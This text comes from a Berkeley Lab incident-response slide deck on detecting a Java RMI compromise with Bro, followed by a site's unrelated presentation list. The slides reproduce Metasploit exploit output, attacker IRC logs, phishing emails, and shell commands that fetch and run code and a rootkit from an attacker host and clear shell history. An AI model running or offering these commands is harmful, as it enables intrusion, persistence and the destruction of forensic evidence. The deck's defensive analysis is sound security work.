p0wnage and detection with bro
play

p0wnage and detection with Bro Aashish Sharma & Vincent Stoffer - PowerPoint PPT Presentation

Aug 26, 2022 •206 likes •753 views

p0wnage and detection with Bro Aashish Sharma & Vincent Stoffer Berkeley Lab 80 Years of World-Leading Team Science at Lawrence Berkeley National Laboratory Managed and operated by UC for the U.S. Department of Energy >200

  1. p0wnage and detection with Bro Aashish Sharma & Vincent Stoffer Berkeley Lab

  2. 80 Years of World-Leading Team Science at Lawrence Berkeley National Laboratory • Managed and operated by UC for the U.S. Department of Energy • >200 University of California faculty on staff at LBNL • 4200 Employees, ~$820M/year Budget • 13 Nobel Prizes • 63 members of the National Academy of Sciences (~3% of the Academy) • 18 members of the National Academy of Engineering, 2 of the Institute of Medicine Office of 2 Science

  3. World-Class User Facilities Serving the Nation and the World Advanced Molecular Light Foundry Source Joint Genome Institute Energy Sciences Network National Energy Research FLEXlab Supercomputer Over 10,000 visiting scientists (~2/3 from universities) use Berkeley Lab research facilities each year Office of 3 Science

  4. LBL is the birthplace of Bro ● Bro logs on disk from 1990s ● Close collaboration with the Bro team ● We use Bro for everything! ○ Of course we have other tools also

  5. Releasing our 100G Intrusion Detection document http://go.lbl.gov/100g

  6. How do we do IR with Bro? ● No SEIM (except Gmail) ○ so we make bro act as SEIM ● Central log repo + multiple “crunching” machines ● GNU parallel and command line tools ○ (grep, awk, sed, sort, cut, cf, hf, etc.) ● Why? ○ It’s still the fastest we’ve found and the team has lots of old school tricks ● Bro is among the tools that detect incidents, but it _always_ helps solve them

  8. Fireeye alert alerts: msg: normal product: Web MPS version: 7.1.1.209016 appliance: fireeye.lbl.gov alert (id:1481036, name:malware-callback): severity: crit explanation: protocol: tcp analysis: content malware-detected: malware (name:Trojan.Meterpreter): stype: bot-command sid: 33336028 protocol: tcp port: 8080 address: 209.112.253.167 location: US/CO/Golden channel: POST /g6uP_DrmyU6s3EzbVypHJ/ HTTP/1.1::~~User-Agent: Java/1.4.2_03::~~Host: 209.112.253.167:8080::~~Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2::~~Connection: keep-alive::~~Content-Type: application/x-www-form-urlencoded::~~Content-Length: 126::~~::~~ src: vlan: 0 ip: 131.243.xxx.xxx host: xxxxx.lbl.gov port: 60668 mac: dst: ip: 209.112.253.167 mac: port: 8080 occurred: 2014-05-25T05:28:38Z mode: tap label: A1 interface (mode:tap, label:A1): pether3 alert-url: https://fireeye.lbl.gov/event_stream/events_for_bot?ev_id=1481036 action: notified

  9. Quick...to the conn logs! Correlation with the Fireeye IP: May 24 22:20:31 209.112.253.167 39158 131.243.xxx.xxx 1099 tcp - 4.721549 203 44 SF F 0 ShADadfF 7 575 6 364 May 24 22:20:32 131.243.xxx.xxx 60485 209.112.253.167 8080 tcp http 3.514699 419 30552 SF T 0 ShADadfFr 23 1623 27 31928 How did they find it? Scanner blocked soon after… May 23 22:12:46 50.21.187.18 47010 131.243.xxx.xxx 1099 tcp - 0.062209 0 0 RSTO F 0 ShR 2 80 44

  10. Java RMI ● Allows you to upload Java application components/bundles (among other things) ● Often used for app-specific functionality ● Several vulnerabilities with older versions ● Defaults to port 1099/tcp

  11. more conn.log First we see the RMI upload: May 24 22:16:56 107.161.158.254 42364 131.243.xxx.xxx 1099 tcp - 2.380179 198 2640 SF F 0 ShADadfF This looks like Metasploit: May 24 22:20:31 131.243.xxx.xxx 60482 209.112.253.167 8080 tcp http 5.372625 180 7154 SF T 0 ShADadFf May 24 22:20:32 CJ36Ya23iZgqSwZqI 131.243.xxx.xxx 60485 209.112.253.167 8080 tcp http 3.514699 419 30552 SF T 0 ShADadfFr

  12. Then the http logs Confirming the GET of our exploit: May 24 22:20:31 CWXEiw4opxO6pQqMHb 131.243.xxx.xxx 60482 209.112.253.167 8080 1 GET 209.112.253.167 /OJpl3rP6kDDz/femw.jar - Java/1.4.2_03 0 7015 200 OK - - - (empty) - - - - - FNx3Px2NhlZziiztJk application/zip May 24 22:20:32 CJ36Ya23iZgqSwZqI 131.243.xxx.xxx 60485 209.112.253.167 8080 1 GET 209.112.253.167 /INITJM - Java/1.4.2_03030470 200 OK - - - (empty) - - - - - FbzYLI3zFZam4tVf21 application/octet- stream Then the reverse shell/meterpreter session begins: May 24 22:20:36 CFz00C2y9yukeY98L1 131.243.xxx.xxx 60486 209.112.253.167 8080 1 POST 209.112.253.167 /RvGS_VIGdv5tex3PT5ALQ/ - Java/1.4.2_03 4 38916 200 OK - - - (empty) - - - FFiphrjsAzy2OYZY8 text/plain FZJKjl14HsEpevI4b6 application/octet-stream May 24 22:20:36 CBFoYM26kAlx03AE84 131.243.xxx.xxx 60487 209.112.253.167 8080 1 POST 209.112.253.167 /RvGS_VIGdv5tex3PT5ALQ/ - Java/1.4.2_03 888 0 200 OK - - - (empty) - - - FHfnM73a2CtqDw5yA9 application/octet-stream - -

  13. Confirmed with Metasploit msf exploit(java_rmi_server) > exploit [*] Started reverse handler on 131.243.xx.xxx:4444 [*] Using URL: http://0.0.0.0:4445/ [*] Local IP: http://131.243.xx.xxx:4445/ [*] Connected and sending request for http://131.243.xx.xxx:4445//KqgMtwKu.jar [*] 131.243.yyy.yyy java_rmi_server - Replied to request for payload JAR [*] Sending stage (30355 bytes) to 131.243.yyy.yyy [*] Meterpreter session 1 opened (131.243.xx.xxx:4444 -> 131.243.yyy.yyy:33597) at 2014-05-25 12:19:12 -0700 [+] Target 131.243.yyy.yyy:1099 may be exploitable... [*] Server stopped. meterpreter > getuid Server username: root meterpreter > sysinfo Computer : xxxxx.lbl.gov OS : Linux 2.4.20-28.8smp (i386) Meterpreter : java/java

  14. irc logs irc-limited May 24 22:24:44 #35 131.243.xxx.xxx/60589 > 50.57.189.33/1025 NICK LTVZH May 24 22:24:44 #35 131.243.xxx.xxx/60589 > 50.57.189.33/1025 USER BJQOIF localhost localhost :DRCE May 24 22:24:45 #35 131.243.xxx.xxx/60589 > 50.57.189.33/1025 50-57-189-33.static.cloud- ips.com JOIN #dev# with channel key: ':fucku' May 24 22:24:45 #35 131.243.xxx.xxx/60589 > 50.57.189.33/1025 50-57-189-33.static.cloud- ips.com JOIN #dev# irc-detailed May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) NOTICE Auth :Welcome to ^BRoxNet^B! May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) 001 LTVZH :Welcome to the RoxNet IRC Network LTVZH!BJQOIF@XXXXX.lbl.gov May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) 002 LTVZH :Your host is RoxNet.net, running version InspIRCd-2.0 May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) 003 LTVZH :This server was created 03:45:33 May 11 2014 May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) 004 LTVZH RoxNet.net InspIRCd-2.0 BHIRSWciorswx ACHIMNOPQRSTYabcghijklmnopqrstuvz HIYabghjkloqv

  15. IRC detail logs #dev# :uhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh (q!z@oper.z0r.us) PRIVMSG #dev# :.ip 131.243.x.x (NSAGOV!eggdrop@rapesec2ee8uk.members.linode.com) PRIVMSG #dev# :Range: 131.243.0.0 - 131.243.255.255 :: NetName: LBL-IP-NET2 :: Organization: Lawrence Berkeley National Laboratory :: Country: US (syn!whothef@master.net) PRIVMSG #dev# :^A ACTION shoves clothes into bag ^A (q!z@oper.z0r.us) PRIVMSG #dev# :see you in mexico (syn!whothef@master.net) PRIVMSG #dev# :mexico is just where im telling you snitches im going (syn!whothef@master.net) PRIVMSG #dev# :YOU CAN BOTH FRY (syn!whothef@master.net) PRIVMSG #dev# :forte prob left (syn!whothef@master.net) PRIVMSG #dev# :fuck you (q!z@oper.z0r.us) PRIVMSG #dev# :ROFL (syn!whothef@master.net) PRIVMSG #dev# :LOL (syn!whothef@master.net) PRIVMSG #dev# :idk if we should keep it kaiten'd man (syn!whothef@master.net) PRIVMSG #dev# :lol (syn!whothef@master.net) PRIVMSG #dev# :i can try to rootkit it (syn!whothef@master.net) PRIVMSG #dev# :man thats scary as fuck

  16. Watching Metasploit with Time Machine wget http://rapesec.servehttp.com/conf.c gcc -o /tmp/... /tmp/conf.c;/tmp/... rm -rf conf.c; history -c CHAT CLIENT rm -rf ~/.bash_history;ln -s /dev/null ~/. bash_history CLEAR HISTORY cd /tmp; wget http://rapesec.servehttp. com/jsnow.tar.gz tar zxf jsnow.tar.gz;rm -rf jsnow.tar.gz;cd jsnow;./setup.sh ROOTKIT

  17. Feeding back into Bro: HTTP_SensitiveURI (example of extending a policy) wget http://rapesec.servehttp.com/jsnow.tar.gz redef sensitive_URIs += / jsnow\.tar\.gz / ; event http_request(c: connection, method: string, original_URI: string, unescaped_URI: string, version: string) &priority=3 { local url = build_url_http(c$http); local message = fmt("%s %s", c$http$method, url); if ( sensitive_URIs in unescaped_URI ) { NOTICE([$note=HTTP_SensitiveURI, $msg=message, $method=c$http$method, $conn=c, $URL=url, $identifier=cat(c$id$orig_h,url),$suppress_for=180 min]); } }

  18. Gmail phishing attack (Need for a new policy)

  19. Subject: Important document Please see the attached file for your review. Thank you, Loan Broker Document8229tax.PDF <http://www.newfleld.com/>

  20. Subject: Important document Please see the attached file for your review. Thank you, User Lab-Docs.Pdf <http://www.newfleld.com/>

  21. Delivered to ~1700 people, 800 Lab and 900 external

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Detection of neutral particles detection of neutrons detection of neutrinons detection of low

Detection of neutral particles detection of neutrons detection of neutrinons detection of low

Detection of neutral particles detection of neutrons detection of neutrinons detection of low energy photons (detection of high energy photons calorimeters) Peter Krizan, Neutron and neutrino detection Detection of neutral particles

1.21k views • 67 slides
Low Level Low Level Low Level Low Level Detection of Detection of Detection of Detection of

Low Level Low Level Low Level Low Level Detection of Detection of Detection of Detection of

Low Level Low Level Low Level Low Level Detection of Detection of Detection of Detection of Ammonia Ammonia A A i i Ne w Me thod Validate d F ollowing E PA Guidanc e AT AT P Case #: N08 0004 P Case #: N08-0004 E dwa rd F Aske w

551 views • 32 slides
Collision Detection Collision detection weaknesses Naive collision detection suffers from 3 known

Collision Detection Collision detection weaknesses Naive collision detection suffers from 3 known

07 Tutorial: Broadphase Collision Detection Collision detection weaknesses Naive collision detection suffers from 3 known weaknesses Fixed-timestep weakness All-pairs weakness Pair-processing weakness Two-phase collision detection

833 views • 20 slides
GT14: Instrumentation et detection GT14: Instrumentation et detection Tracking detectors

GT14: Instrumentation et detection GT14: Instrumentation et detection Tracking detectors

GT14: Instrumentation et detection GT14: Instrumentation et detection Tracking detectors perspectives in France Giovanni Calderini (LPNHE Paris) Journes Prospectives IN2P3/IRFU Giens 2012 1 Huge subject in terms of detection principles /

319 views • 30 slides
Perimeter Intrusion Detection Mikro Tek Detection Technologies Ltd | +44 (0) 1773 744750 |

Perimeter Intrusion Detection Mikro Tek Detection Technologies Ltd | +44 (0) 1773 744750 |

Perimeter Intrusion Detection Mikro Tek Detection Technologies Ltd | +44 (0) 1773 744750 | info@detection-technologies.com | www.detection-technologies.com Mikro Tek Key Advantages One analyzer - up to 300m detection range! A single Mikro Tek

874 views • 6 slides
Error Detection Codes Error Detection Two types Nave scheme Error Detection Codes

Error Detection Codes Error Detection Two types Nave scheme Error Detection Codes

Srinidhi Varadarajan 02/14/2000 Error Detection Codes Error Detection Two types Nave scheme Error Detection Codes (e.g. CRC, Send a duplicate copy of the Parity, Checksums) message Error Correction Codes (e.g. Problems

269 views • 5 slides
www.thomas-leak-detection.com Leak Detection Class I Presentation EN 2014-02-19 Part1.docx ABOUT

www.thomas-leak-detection.com Leak Detection Class I Presentation EN 2014-02-19 Part1.docx ABOUT

Class I Leak Detection Systems - Highest level of monitoring and prevention of double walled tanks and pipes, according EU Standard EN 13160-2 Advantages Working Principle Product Overview www.thomas-leak-detection.com Leak

206 views • 16 slides
ERROR DETECTON &amp; CORRECTION Error Detection EDC= Error Detection and Correction bits

ERROR DETECTON &amp; CORRECTION Error Detection EDC= Error Detection and Correction bits

ERROR DETECTON &amp; CORRECTION Error Detection EDC= Error Detection and Correction bits (redundancy) D = Data protected by error checking, may include header fields Error detection not 100% reliable! protocol may miss some errors,

320 views • 18 slides
Outlier Detection Motivation: Fraud Detection http://i.imgur.com/ckkoAOp.gif Jian Pei: CMPT

Outlier Detection Motivation: Fraud Detection http://i.imgur.com/ckkoAOp.gif Jian Pei: CMPT

Outlier Detection Motivation: Fraud Detection http://i.imgur.com/ckkoAOp.gif Jian Pei: CMPT 741/459 Data Mining -- Outlier Detection (1) 2 Techniques: Fraud Detection Features Dissimilarity Groups and noise

878 views • 30 slides
People-Tracking-by-Detection and People-Detection-by-Tracking Mykhaylo Andriluka Stefan Roth

People-Tracking-by-Detection and People-Detection-by-Tracking Mykhaylo Andriluka Stefan Roth

People-Tracking-by-Detection and People-Detection-by-Tracking Mykhaylo Andriluka Stefan Roth Bernt Schiele Department of Computer Science TU Darmstadt People-Tracking-by-Detection and People-Detection-by-Tracking - CVPR 2008 Motivation

899 views • 89 slides
CS 1666 www.cs.pitt.edu/~nlf4/cs1666/ Collision detection Collision detection We already had to

CS 1666 www.cs.pitt.edu/~nlf4/cs1666/ Collision detection Collision detection We already had to

CS 1666 www.cs.pitt.edu/~nlf4/cs1666/ Collision detection Collision detection We already had to implement some basic collision detection in the motion example I.e., to keep our square from moving out of the window Checking for

679 views • 14 slides
Detection, Segmentation Overview Object Detection deer cat Object Detection as Classification

Detection, Segmentation Overview Object Detection deer cat Object Detection as Classification

CS6501: Deep Learning for Visual Recognition Detection, Segmentation Overview Object Detection deer cat Object Detection as Classification deer? cat? CNN background? Object Detection as Classification deer? cat? CNN background?

577 views • 28 slides
Improving MIMO Sphere Detection Through Antenna Detection Order Scheduling Michael Wu, Chris

Improving MIMO Sphere Detection Through Antenna Detection Order Scheduling Michael Wu, Chris

Improving MIMO Sphere Detection Through Antenna Detection Order Scheduling Michael Wu, Chris Dick, Yang Sun, Joseph Cavallaro December 1, 2011 MIMO Detection Spatial Multiplexing H Increases throughput Used in many wireless

200 views • 16 slides
A Review on Salient Object Detection Feng Lin Salient Object Detection Target Detect and

A Review on Salient Object Detection Feng Lin Salient Object Detection Target Detect and

A Review on Salient Object Detection Feng Lin Salient Object Detection Target Detect and segment salient objects in natural scenes a) good detection b) high resolution c) computational efficiency Metric F-score MAE (mean

1.12k views • 39 slides
Digital Image Processing (CS/ECE 545) Lecture 5: Edge Detection (Part 2) &amp; Corner Detection

Digital Image Processing (CS/ECE 545) Lecture 5: Edge Detection (Part 2) &amp; Corner Detection

Digital Image Processing (CS/ECE 545) Lecture 5: Edge Detection (Part 2) &amp; Corner Detection Prof Emmanuel Agu Computer Science Dept. Worcester Polytechnic Institute (WPI) Recall: Edge Detection Image processing task that finds edges and

773 views • 63 slides
Voice Activity Detection Voice Activity Detection Speaker Recognition Feature Extraction

Voice Activity Detection Voice Activity Detection Speaker Recognition Feature Extraction

Voice Activity Detection Introduction Voice Activity Detection Voice Activity Detection Speaker Recognition Feature Extraction Algorithms Victor Lenoir Threshold VAD Gaussian Mixture Model VAD LRDE Experiments Laboratoire de Recherche

367 views • 35 slides
Bro scripts - 101 to 595 in 45 mins Aashish Sharma UNIVERSITY OF CALIFORNIA Zeek scripts - 101

Bro scripts - 101 to 595 in 45 mins Aashish Sharma UNIVERSITY OF CALIFORNIA Zeek scripts - 101

Bro scripts - 101 to 595 in 45 mins Aashish Sharma UNIVERSITY OF CALIFORNIA Zeek scripts - 101 to 595 in 45 mins Aashish Sharma UNIVERSITY OF CALIFORNIA &quot;Bringing Science Solutions to the World&quot; Hundreds of University

873 views • 66 slides
put systemtap band-aids on security wounds Frank Ch. Eigler Red Hat fche@redhat.com FOSDEM

put systemtap band-aids on security wounds Frank Ch. Eigler Red Hat fche@redhat.com FOSDEM

put systemtap band-aids on security wounds Frank Ch. Eigler Red Hat fche@redhat.com FOSDEM 2016-01-30 abstract Some security bugs can be patched with systemtap. Instead of changing code, change data on the fly. Whats the matter? New CVE

659 views • 38 slides
CS 2112 Lab: Version Control CS 2112 Lab: Version Control What is Version Control? Git Structure

CS 2112 Lab: Version Control CS 2112 Lab: Version Control What is Version Control? Git Structure

What is Version Control? Git Structure Using Git Controlling your computer with a shell CS 2112 Lab: Version Control CS 2112 Lab: Version Control What is Version Control? Git Structure Using Git Controlling your computer with a shell

399 views • 17 slides
Lec09: Miscellaneous Max Wolotsky 2 Happy Halloween :) 3 Scoreboard 4 NSA Codebreaker

Lec09: Miscellaneous Max Wolotsky 2 Happy Halloween :) 3 Scoreboard 4 NSA Codebreaker

1 Lec09: Miscellaneous Max Wolotsky 2 Happy Halloween :) 3 Scoreboard 4 NSA Codebreaker Challenges 5 Administrivia Due: Lab09 is out and its due on Nov 10 NSA Codebreaker Challenge Due: Dec 1 6 Discussion: Lab08 7 Best

671 views • 35 slides
practices for kernel development A.K.A - Bringing sanity to chaos Chase Maupin, system

practices for kernel development A.K.A - Bringing sanity to chaos Chase Maupin, system

Using Agile development practices for kernel development A.K.A - Bringing sanity to chaos Chase Maupin, system integration manager for the Linux Core Product Development (LCPD) team 1 Agenda Agile Manifesto Meet LCPD - Charter and team

530 views • 31 slides
Large-scale emission from FR I jets Pol Bordas with the collaboration of V. Bosch-Ramon &amp; M.

Large-scale emission from FR I jets Pol Bordas with the collaboration of V. Bosch-Ramon &amp; M.

Large-scale emission from FR I jets Pol Bordas with the collaboration of V. Bosch-Ramon &amp; M. Perucho Barcelona June 2011, mircoles 29 de junio de 2011 Large-scale emission in FR I jets Pol Bordas, HEPRO III OUTLINE The FR I/II

424 views • 27 slides
Dynamics of the Heavy-Light Spread in the N. American Oil Market Romain H. Lacombe and John E.

Dynamics of the Heavy-Light Spread in the N. American Oil Market Romain H. Lacombe and John E.

MIT Energy and Environmental Policy Workshop 6-7 December 2007 Dynamics of the Heavy-Light Spread in the N. American Oil Market Romain H. Lacombe and John E. Parsons The Issue North American crude oil markets Light sweet crude: global

841 views • 34 slides
Early Twentieth-Century Fiction e20fic14.blogs.rutgers.edu Prof. Andrew Goldstone

Early Twentieth-Century Fiction e20fic14.blogs.rutgers.edu Prof. Andrew Goldstone

Early Twentieth-Century Fiction e20fic14.blogs.rutgers.edu Prof. Andrew Goldstone (andrew.goldstone@rutgers.edu) (Murray 019, Mondays 2:304:30) CA: Evan Dresman (evan.dresman@rutgers.edu) (36 Union St. 217, Wednesdays 12:002:00) October

942 views • 28 slides

More recommend